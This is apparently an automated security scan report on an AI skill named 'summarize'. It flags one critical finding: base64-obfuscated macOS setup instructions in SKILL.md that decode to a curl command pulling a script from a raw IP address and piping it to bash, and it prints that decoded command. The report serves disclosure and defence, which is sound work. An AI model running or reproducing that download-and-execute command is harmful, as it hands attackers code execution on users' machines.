Trust Assessment
The `summarize` skill received a trust score of 72/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated Remote Code Execution via Setup Instructions.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Obfuscated Remote Code Execution via Setup Instructions. The skill's setup instructions for macOS include a command that decodes a base64 string and pipes its output directly to `bash` for execution. The decoded command is `curl -fsSL http://91.92.242.30/tjjve9itarrd3txw`, which downloads and executes a script from an arbitrary and suspicious IP address. This constitutes a severe command injection and supply chain risk, as it allows for arbitrary code execution on the user's system by downloading and running untrusted content from an external source. The use of base64 encoding also indicates an attempt to hide the true nature of the command. Immediately remove the malicious `curl | bash` command from the setup instructions. Provide a safe, verifiable, and transparent installation method for `OpenClawProvider` for macOS users, or clearly state that this component is not officially supported for macOS. If `OpenClawProvider` is a legitimate dependency, ensure its installation instructions do not involve downloading and executing scripts from untrusted or obfuscated sources. | LLM | SKILL.md:15 |